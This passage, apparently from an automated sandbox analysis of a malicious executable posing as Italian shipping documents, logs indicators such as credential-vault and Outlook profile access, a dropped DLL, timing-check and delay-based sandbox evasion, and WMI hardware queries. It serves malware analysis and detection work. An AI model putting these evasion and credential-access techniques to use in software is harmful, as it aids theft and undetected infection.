            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile written: C:\ProgramData\ankomstperrons.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Documenti di spedizione.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2622907662.0000000007225000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_000D0C55 push edi; retf 4_2_000D0C7A
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_38CF6047 pushad ; iretd 4_2_38CF604E
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeAPI/Special instruction interceptor: Address: 7974D96
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeAPI/Special instruction interceptor: Address: 3CE4D96
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeRDTSC instruction interceptor: First address: 792047D second address: 792047D instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FF0F4F78132h 0x00000006 test dx, DFB8h 0x0000000b inc ebp 0x0000000c test cx, bx 0x0000000f inc ebx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeRDTSC instruction interceptor: First address: 3C9047D second address: 3C9047D instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FF0F4E2A972h 0x00000006 test dx, DFB8h 0x0000000b inc ebp 0x0000000c test cx, bx 0x0000000f inc ebx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeMemory allocated: D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeMemory allocated: 35CC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeMemory allocated: 359B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599452Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599124Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599014Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598249Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596499Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596171Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595948Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595828Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595718Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595609Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595499Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595390Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595279Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595171Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 594843Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 594624Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeWindow / User API: threadDelayed 7521Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeWindow / User API: threadDelayed 2332Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeAPI coverage: 1.5 %
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -34126476536362649s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2292Thread sleep count: 7521 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2292Thread sleep count: 2332 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -599452s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -599124s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -599014s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -598796s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -598578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -598249s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -598140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -598031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -597921s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -597812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -597703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -597593s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -597484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -597374s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -597265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -597156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -597046s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -596937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -596828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -596718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -596609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -596499s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -596390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -596281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -596171s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -596062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -595948s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -595828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -595718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -595609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -595499s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -595390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -595279s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -595171s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -595062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -594953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -594843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -594734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5136Thread sleep time: -594624s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_0040270B FindFirstFileA,0_2_0040270B
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_004061FB FindFirstFileA,FindClose,0_2_004061FB
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405799
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_0040270B FindFirstFileA,4_2_0040270B
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_004061FB FindFirstFileA,FindClose,4_2_004061FB
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405799
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599452Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599124Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599014Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598249Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596609Jump to behavior
